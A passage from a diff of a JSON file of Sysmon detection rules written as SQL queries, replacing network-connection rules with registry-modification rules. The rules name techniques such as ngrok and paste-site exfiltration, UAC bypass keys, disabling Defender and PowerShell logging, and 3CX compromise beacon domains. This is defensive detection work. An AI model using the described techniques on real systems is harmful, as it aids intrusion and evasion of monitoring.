"experimental", - "description": "Detects suspicious \"epmap\" connection to a remote computer via remote procedure call (RPC)", - "author": "frack113, Tim Shelton (fps)", + "description": "Detects disabling Windows Defender PUA protection", + "author": "Austin Songer @austinsonger", "tags": [ - "attack.lateral_movement" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Protocol = 'tcp' AND Initiated = 'true' AND DestinationPort = '135') AND NOT ((Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\ProgramData\\\\Amazon\\\\SSM\\\\Update\\\\amazon-ssm-agent-updater%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\PUAProtection%' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" ], - "filename": "net_connection_win_susp_epmap.yml" + "filename": "registry_set_disabled_pua_protection_on_microsoft_defender.yml" }, { - "title": "Dead Drop Resolvers", - "id": "297ae038-edc2-4b2e-bb3e-7c5fc94dd5c7", + "title": "Potential Registry Persistence Attempt Via Windows Telemetry", + "id": "73a883d0-0348-4be4-a8d8-51031c2564f8", "status": "test", - "description": "Detects an executable, which is not an internet browser, making DNS request to legit popular websites, which were seen to be used as dead drop resolvers in previous attacks.", - "author": "Sorina Ionescu", + "description": "Detects potential persistence behaviour using the windows telemetry registry key.\nWindows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections.\nThis binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run.\nThe problem is, it will run any arbitrary command without restriction of location or type.\n", + "author": "Lednyov Alexey, oscd.community, Sreeman", "tags": [ - "attack.command_and_control", - "attack.t1102", - "attack.t1102.001" + "attack.persistence", + "attack.t1053.005" ], "falsepositives": [ - "One might need to exclude other internet browsers found in it's network or other applications like ones mentioned above from Microsoft Defender." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Initiated = 'true' AND (DestinationHostname LIKE '%cdn.discordapp.com' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.com' ESCAPE '\\' OR DestinationHostname LIKE '%youtube.com' ESCAPE '\\' OR DestinationHostname LIKE '%technet.microsoft.com' ESCAPE '\\' OR DestinationHostname LIKE '%facebook.com' ESCAPE '\\' OR DestinationHostname LIKE '%.cloudflare.com' ESCAPE '\\' OR DestinationHostname LIKE '%docs.google.com' ESCAPE '\\' OR DestinationHostname LIKE '%steamcommunity.com' ESCAPE '\\' OR DestinationHostname LIKE '%reddit.com' ESCAPE '\\' OR DestinationHostname LIKE '%fotolog.com' ESCAPE '\\' OR DestinationHostname LIKE '%twitter.com' ESCAPE '\\' OR DestinationHostname LIKE '%imgur.com' ESCAPE '\\' OR DestinationHostname LIKE '%feeds.rapidfeeds.com' ESCAPE '\\' OR DestinationHostname LIKE '%livejournal.com' ESCAPE '\\' OR DestinationHostname LIKE '%.githubusercontent.com' ESCAPE '\\' OR DestinationHostname LIKE '%pastetext.net' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.pl' ESCAPE '\\' OR DestinationHostname LIKE '%paste.ee' ESCAPE '\\')) AND NOT (((Image LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\edge.exe' ESCAPE '\\' OR Image LIKE '%\\\\opera.exe' ESCAPE '\\' OR Image LIKE '%\\\\brave.exe' ESCAPE '\\' OR Image LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR Image LIKE '%\\\\whale.exe' ESCAPE '\\' OR Image LIKE '%\\\\chrome.exe' ESCAPE '\\' OR Image LIKE '%\\\\firefox.exe' ESCAPE '\\')) OR ((Image LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR Image LIKE '%\\\\MsSense.exe' ESCAPE '\\' OR Image LIKE '%\\\\PRTG Probe.exe' ESCAPE '\\' OR Image LIKE '%\\\\Engine.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\TelemetryController\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Command' ESCAPE '\\' AND (Details LIKE '%.sh%' ESCAPE '\\' OR Details LIKE '%.exe%' ESCAPE '\\' OR Details LIKE '%.dll%' ESCAPE '\\' OR Details LIKE '%.bin%' ESCAPE '\\' OR Details LIKE '%.bat%' ESCAPE '\\' OR Details LIKE '%.cmd%' ESCAPE '\\' OR Details LIKE '%.js%' ESCAPE '\\' OR Details LIKE '%.ps%' ESCAPE '\\' OR Details LIKE '%.vb%' ESCAPE '\\' OR Details LIKE '%.jar%' ESCAPE '\\' OR Details LIKE '%.hta%' ESCAPE '\\' OR Details LIKE '%.msi%' ESCAPE '\\' OR Details LIKE '%.vbs%' ESCAPE '\\')) AND NOT ((Details LIKE '%\\\\system32\\\\CompatTelRunner.exe%' ESCAPE '\\' OR Details LIKE '%\\\\system32\\\\DeviceCensus.exe%' ESCAPE '\\')))" ], - "filename": "net_connection_win_dead_drop_resolvers.yml" + "filename": "registry_set_telemetry_persistence.yml" }, { - "title": "Certutil Initiated Connection", - "id": "0dba975d-a193-4ed1-a067-424df57570d1", - "status": "experimental", - "description": "Detects a network connection intitiated by the certutil.exe tool. Attackers can abuse `certutil.exe` to download malware or offensive security tools.", - "author": "frack113, Florian Roth", + "title": "Bypass UAC Using SilentCleanup Task", + "id": "724ea201-6514-4f38-9739-e5973c34f49a", + "status": "test", + "description": "There is an auto-elevated task called SilentCleanup located in %windir%\\system32\\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC", + "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1548.002" ], "falsepositives": [ - "Legitimate certutil network connection" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\certutil.exe' ESCAPE '\\' AND Initiated = 'true' AND DestinationPort IN ('80', '443', '135', '445'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\Environment\\\\windir' ESCAPE '\\' AND Details LIKE '%&REM%' ESCAPE '\\' AND EventType = 'SetValue')" ], - "filename": "net_connection_win_certutil.yml" + "filename": "registry_set_bypass_uac_using_silentcleanup_task.yml" }, { - "title": "Equation Editor Network Connection", - "id": "a66bc059-c370-472c-a0d7-f8fd1bf9d583", + "title": "Bypass UAC Using Event Viewer", + "id": "674202d0-b22a-4af4-ae5f-2eda1f3da1af", "status": "experimental", - "description": "Detects network connections from Equation Editor", - "author": "Max Altgelt (Nextron Systems)", + "description": "Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1203" + "attack.persistence", + "attack.t1547.010" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\eqnedt32.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\_Classes\\\\mscfile\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\') AND NOT (Details LIKE '\\%SystemRoot\\%\\\\system32\\\\mmc.exe \"\\%1\" \\%%' ESCAPE '\\'))" ], - "filename": "net_connection_win_eqnedt.yml" + "filename": "registry_set_bypass_uac_using_eventviewer.yml" }, { - "title": "Suspicious Outbound Kerberos Connection", - "id": "e54979bd-c5f9-4d6c-967b-a04b19ac4c74", - "status": "test", - "description": "Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.", - "author": "Ilyas Ochkov, oscd.community", + "title": "VBScript Payload Stored in Registry", + "id": "46490193-1b22-4c29-bdd6-5bf63907216f", + "status": "experimental", + "description": "Detects VBScript content stored into registry keys as seen being used by UNC2452 group", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1558", - "attack.lateral_movement", - "attack.t1550.003" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Web Browsers" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (DestinationPort = '88' AND Initiated = 'true') AND NOT (((Image LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion%' ESCAPE '\\' AND (Details LIKE '%vbscript:%' ESCAPE '\\' OR Details LIKE '%jscript:%' ESCAPE '\\' OR Details LIKE '%mshtml,%' ESCAPE '\\' OR Details LIKE '%RunHTMLApplication%' ESCAPE '\\' OR Details LIKE '%Execute(%' ESCAPE '\\' OR Details LIKE '%CreateObject%' ESCAPE '\\' OR Details LIKE '%window.close%' ESCAPE '\\')) AND NOT ((TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\') OR (Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Installer\\\\UserData\\\\%' ESCAPE '\\' AND (Details LIKE '%\\\\Microsoft.NET\\\\Primary Interop Assemblies\\\\Microsoft.mshtml.dll%' ESCAPE '\\' OR Details LIKE '%<\\\\Microsoft.mshtml,fileVersion=%' ESCAPE '\\' OR Details LIKE '%\\_mshtml\\_dll\\_%' ESCAPE '\\' OR Details LIKE '%<\\\\Microsoft.mshtml,culture=%' ESCAPE '\\'))))" ], - "filename": "net_connection_win_susp_outbound_kerberos_connection.yml" + "filename": "registry_set_vbs_payload_stored.yml" }, { - "title": "Script Initiated Connection to Non-Local Network", - "id": "992a6cae-db6a-43c8-9cec-76d7195c96fc", + "title": "Disabled RestrictedAdminMode For RDS", + "id": "d6ce7ebd-260b-4323-9768-a9631c8d4db2", "status": "experimental", - "description": "Detects a script interpreter wscript/cscript opening a network connection to a non-local network. Adversaries may use script to download malicious payloads.", - "author": "frack113, Florian Roth", + "description": "Detect activation of DisableRestrictedAdmin to desable RestrictedAdmin mode.\nRestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.\nThis prevents your credentials from being harvested during the initial connection process if the remote server has been compromise\n", + "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Legitimate scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Initiated = 'true' AND (Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\')) AND NOT (((DestinationIp LIKE '127.%' ESCAPE '\\' OR DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '172.%' ESCAPE '\\' OR DestinationIp LIKE '192.%' ESCAPE '\\' OR DestinationIp LIKE '169.254.%' ESCAPE '\\' OR DestinationIp LIKE '20.%' ESCAPE '\\')) OR ((DestinationIp LIKE '::1%' ESCAPE '\\' OR DestinationIp LIKE '0:0:0:0:0:0:0:1%' ESCAPE '\\' OR DestinationIp LIKE 'fe80:%' ESCAPE '\\' OR DestinationIp LIKE 'fc%' ESCAPE '\\' OR DestinationIp LIKE 'fd%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\DisableRestrictedAdmin' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')" ], - "filename": "net_connection_win_script_wan.yml" + "filename": "registry_set_lsa_disablerestrictedadmin.yml" }, { - "title": "Potential Compromised 3CXDesktopApp Beaconing Activity - Netcon", - "id": "51eecf75-d069-43c7-9ea2-63f75499edd4", + "title": "Change User Account Associated with the FAX Service", + "id": "e3fdf743-f05b-4051-990a-b66919be1743", "status": "experimental", - "description": "Detects potential beaconing activity to domains related to 3CX 3CXDesktopApp compromise", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect change of the user account associated with the FAX service to avoid the escalation problem.", + "author": "frack113", "tags": [ - "attack.command_and_control" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\3CXDesktopApp.exe' ESCAPE '\\' AND (DestinationHostname LIKE '%akamaicontainer.com%' ESCAPE '\\' OR DestinationHostname LIKE '%akamaitechcloudservices.com%' ESCAPE '\\' OR DestinationHostname LIKE '%azuredeploystore.com%' ESCAPE '\\' OR DestinationHostname LIKE '%azureonlinecloud.com%' ESCAPE '\\' OR DestinationHostname LIKE '%azureonlinestorage.com%' ESCAPE '\\' OR DestinationHostname LIKE '%dunamistrd.com%' ESCAPE '\\' OR DestinationHostname LIKE '%glcloudservice.com%' ESCAPE '\\' OR DestinationHostname LIKE '%journalide.org%' ESCAPE '\\' OR DestinationHostname LIKE '%msedgepackageinfo.com%' ESCAPE '\\' OR DestinationHostname LIKE '%msstorageazure.com%' ESCAPE '\\' OR DestinationHostname LIKE '%msstorageboxes.com%' ESCAPE '\\' OR DestinationHostname LIKE '%officeaddons.com%' ESCAPE '\\' OR DestinationHostname LIKE '%officestoragebox.com%' ESCAPE '\\' OR DestinationHostname LIKE '%pbxcloudeservices.com%' ESCAPE '\\' OR DestinationHostname LIKE '%pbxphonenetwork.com%' ESCAPE '\\' OR DestinationHostname LIKE '%pbxsources.com%' ESCAPE '\\' OR DestinationHostname LIKE '%qwepoi123098.com%' ESCAPE '\\' OR DestinationHostname LIKE '%sbmsa.wiki%' ESCAPE '\\' OR DestinationHostname LIKE '%sourceslabs.com%' ESCAPE '\\' OR DestinationHostname LIKE '%visualstudiofactory.com%' ESCAPE '\\' OR DestinationHostname LIKE '%zacharryblogs.com%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\Fax\\\\ObjectName' ESCAPE '\\' AND NOT (Details LIKE '%NetworkService%' ESCAPE '\\'))" ], - "filename": "net_connection_win_malware_3cx_compromise_beaconing_activity.yml" + "filename": "registry_set_fax_change_service_user.yml" }, { - "title": "Regsvr32 Network Activity", - "id": "c7e91a02-d771-4a6d-a700-42587e0b1095", - "status": "test", - "description": "Detects network connections and DNS queries initiated by Regsvr32.exe", - "author": "Dmitriy Lifanov, oscd.community", + "title": "Potential Signing Bypass Via Windows Developer Features - Registry", + "id": "b110ebaf-697f-4da1-afd5-b536fa27a2c1", + "status": "experimental", + "description": "Detects when the enablement of developer features such as \"Developer Mode\" or \"Application Sideloading\". Which allows the user to install untrusted packages.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1559.001", - "attack.defense_evasion", - "attack.t1218.010" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\AppModelUnlock%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\Appx\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\AllowAllTrustedApps' ESCAPE '\\' OR TargetObject LIKE '%\\\\AllowDevelopmentWithoutDevLicense' ESCAPE '\\') AND Details = 'DWORD (0x00000001)')" ], - "filename": "net_connection_win_regsvr32_network_activity.yml" + "filename": "registry_set_turn_on_dev_features.yml" }, { - "title": "RDP Over Reverse SSH Tunnel", - "id": "5f699bc5-5446-4a4a-a0b7-5ef2885a3eb4", - "status": "test", - "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389", - "author": "Samir Bousseaden", + "title": "Potential Persistence Via CHM Helper DLL", + "id": "976dd1f2-a484-45ec-aa1d-0e87e882262b", + "status": "experimental", + "description": "Detects when an attacker modifies the registry key \"HtmlHelp Author\" to achieve persistence", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1572", - "attack.lateral_movement", - "attack.t1021.001", - "car.2013-07-002" + "attack.persistence" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Initiated = 'true' AND SourcePort = '3389') AND (DestinationIp LIKE '127.%' ESCAPE '\\' OR DestinationIp = '::1'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\HtmlHelp Author\\\\Location%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\HtmlHelp Author\\\\Location%' ESCAPE '\\'))" ], - "filename": "net_connection_win_rdp_reverse_tunnel.yml" + "filename": "registry_set_persistence_chm.yml" }, { - "title": "Communication To Ngrok.Io", - "id": "18249279-932f-45e2-b37a-8925f2597670", + "title": "New DNS ServerLevelPluginDll Installed", + "id": "e61e8a88-59a9-451c-874e-70fcc9740d67", "status": "experimental", - "description": "Detects an executable accessing ngrok.io, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", + "description": "Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1567.001" + "attack.defense_evasion", + "attack.t1574.002", + "attack.t1112" ], "falsepositives": [ - "Legitimate use of ngrok.io" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Initiated = 'true' AND DestinationHostname LIKE '%.ngrok.io' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\services\\\\DNS\\\\Parameters\\\\ServerLevelPluginDll' ESCAPE '\\')" ], - "filename": "net_connection_win_ngrok_io.yml" + "filename": "registry_set_dns_server_level_plugin_dll.yml" }, { - "title": "Suspicious Outbound RDP Connections", - "id": "ed74fe75-7594-4b4b-ae38-e38e3fd2eb23", - "status": "test", - "description": "Detects Non-Standard Tools Connecting to TCP port 3389 indicating possible lateral movement", - "author": "Markus Neis", + "title": "PowerShell Logging Disabled Via Registry Key Tampering", + "id": "fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7", + "status": "experimental", + "description": "Detects changes to the registry for the currently logged-in user. In order to disable PowerShell module logging, script block logging or transcription and script execution logging", + "author": "frack113", "tags": [ - "attack.lateral_movement", - "attack.t1021.001", - "car.2013-07-002" + "attack.defense_evasion", + "attack.t1564.001" ], "falsepositives": [ - "Other Remote Desktop RDP tools", - "Domain controller using dns.exe" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (DestinationPort = '3389' AND Initiated = 'true') AND NOT (((Image LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR Image LIKE '%\\\\RTSApp.exe' ESCAPE '\\' OR Image LIKE '%\\\\RTS2App.exe' ESCAPE '\\' OR Image LIKE '%\\\\RDCMan.exe' ESCAPE '\\' OR Image LIKE '%\\\\ws\\_TunnelService.exe' ESCAPE '\\' OR Image LIKE '%\\\\RSSensor.exe' ESCAPE '\\' OR Image LIKE '%\\\\RemoteDesktopManagerFree.exe' ESCAPE '\\' OR Image LIKE '%\\\\RemoteDesktopManager.exe' ESCAPE '\\' OR Image LIKE '%\\\\RemoteDesktopManager64.exe' ESCAPE '\\' OR Image LIKE '%\\\\mRemoteNG.exe' ESCAPE '\\' OR Image LIKE '%\\\\mRemote.exe' ESCAPE '\\' OR Image LIKE '%\\\\Terminals.exe' ESCAPE '\\' OR Image LIKE '%\\\\spiceworks-finder.exe' ESCAPE '\\' OR Image LIKE '%\\\\FSDiscovery.exe' ESCAPE '\\' OR Image LIKE '%\\\\FSAssessment.exe' ESCAPE '\\' OR Image LIKE '%\\\\MobaRTE.exe' ESCAPE '\\' OR Image LIKE '%\\\\chrome.exe' ESCAPE '\\' OR Image LIKE '%\\\\System32\\\\dns.exe' ESCAPE '\\' OR Image LIKE '%\\\\thor.exe' ESCAPE '\\' OR Image LIKE '%\\\\thor64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Passwordstate.exe' ESCAPE '\\' OR Image LIKE '%\\\\Avast Software\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\' OR Image LIKE '%\\\\Ranger\\\\SentinelRanger.exe' ESCAPE '\\' OR Image LIKE '%\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\') OR Image LIKE 'C:\\\\Program Files\\\\SplunkUniversalForwarder\\\\bin\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\') OR (Image = '') OR (Image = '')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\PowerShell\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\PowerShellCore\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\ModuleLogging\\\\EnableModuleLogging' ESCAPE '\\' OR TargetObject LIKE '%\\\\ScriptBlockLogging\\\\EnableScriptBlockLogging' ESCAPE '\\' OR TargetObject LIKE '%\\\\ScriptBlockLogging\\\\EnableScriptBlockInvocationLogging' ESCAPE '\\' OR TargetObject LIKE '%\\\\Transcription\\\\EnableTranscripting' ESCAPE '\\' OR TargetObject LIKE '%\\\\Transcription\\\\EnableInvocationHeader' ESCAPE '\\' OR TargetObject LIKE '%\\\\EnableScripts' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')" ], - "filename": "net_connection_win_susp_rdp.yml" + "filename": "registry_set_powershell_logging_disabled.yml" }, { - "title": "Microsoft Binary Suspicious Communication Endpoint", - "id": "e0f8ab85-0ac9-423b-a73a-81b3c7b1aa97", - "status": "test", - "description": "Detects an executable in the Windows folder accessing suspicious domains", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Persistence Via Outlook Today Pages", + "id": "487bb375-12ef-41f6-baae-c6a1572b4dd1", + "status": "experimental", + "description": "Detects potential persistence activity via outlook today pages. An attacker can set a custom page to execute arbitrary code and link to it via the registry key \"UserDefinedUrl\".", + "author": "Tobias Michalski (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1105" + "attack.persistence", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Initiated = 'true' AND (DestinationHostname LIKE '%dl.dropboxusercontent.com' ESCAPE '\\' OR DestinationHostname LIKE '%.pastebin.com' ESCAPE '\\' OR DestinationHostname LIKE '%.githubusercontent.com' ESCAPE '\\' OR DestinationHostname LIKE '%cdn.discordapp.com/attachments/' ESCAPE '\\' OR DestinationHostname LIKE '%mediafire.com' ESCAPE '\\' OR DestinationHostname LIKE '%mega.nz' ESCAPE '\\' OR DestinationHostname LIKE '%ddns.net' ESCAPE '\\' OR DestinationHostname LIKE '%.paste.ee' ESCAPE '\\' OR DestinationHostname LIKE '%.hastebin.com/raw/' ESCAPE '\\' OR DestinationHostname LIKE '%.ghostbin.co/' ESCAPE '\\' OR DestinationHostname LIKE '%ufile.io' ESCAPE '\\' OR DestinationHostname LIKE '%anonfiles.com' ESCAPE '\\' OR DestinationHostname LIKE '%send.exploit.in' ESCAPE '\\' OR DestinationHostname LIKE '%transfer.sh' ESCAPE '\\' OR DestinationHostname LIKE '%privatlab.net' ESCAPE '\\' OR DestinationHostname LIKE '%privatlab.com' ESCAPE '\\' OR DestinationHostname LIKE '%sendspace.com' ESCAPE '\\' OR DestinationHostname LIKE '%pastetext.net' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.pl' ESCAPE '\\' OR DestinationHostname LIKE '%paste.ee' ESCAPE '\\') AND (Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Outlook\\\\Today\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%Stamp' ESCAPE '\\' AND Details = 'DWORD (0x00000001)') OR TargetObject LIKE '%UserDefinedUrl' ESCAPE '\\')) AND NOT (((Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND Image LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\')))" ], - "filename": "net_connection_win_binary_susp_com.yml" + "filename": "registry_set_persistence_outlook_todaypage.yml" }, { - "title": "Communication To Ngrok Tunneling Service", - "id": "1d08ac94-400d-4469-a82f-daee9a908849", + "title": "Registry Disable System Restore", + "id": "5de03871-5d46-4539-a82d-3aa992a69a83", "status": "experimental", - "description": "Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the modification of the registry to disable a system restore on the computer", + "author": "frack113", "tags": [ - "attack.exfiltration", - "attack.command_and_control", - "attack.t1567", - "attack.t1568.002", - "attack.t1572", - "attack.t1090", - "attack.t1102", - "attack.s0508" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Legitimate use of ngrok" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (DestinationHostname LIKE '%tunnel.us.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.eu.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.ap.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.au.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.sa.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.jp.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.in.ngrok.com%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows NT\\\\SystemRestore%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SystemRestore%' ESCAPE '\\') AND (TargetObject LIKE '%DisableConfig' ESCAPE '\\' OR TargetObject LIKE '%DisableSR' ESCAPE '\\') AND Details = 'DWORD (0x00000001)')" ], - "filename": "net_connection_win_ngrok_tunnel.yml" + "filename": "registry_set_disable_system_restore.yml" }, { - "title": "Communication To Mega.nz", - "id": "fdeebdf0-9f3f-4d08-84a6-4c4d13e39fe4", - "status": "test", - "description": "Detects an executable accessing mega.co.nz, which could be a sign of forbidden file sharing use of data exfiltration by malicious actors", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Qakbot Registry Activity", + "id": "1c8e96cd-2bed-487d-9de0-b46c90cade56", + "status": "experimental", + "description": "Detects a registry key used by IceID in a campaign that distributes malicious OneNote files", + 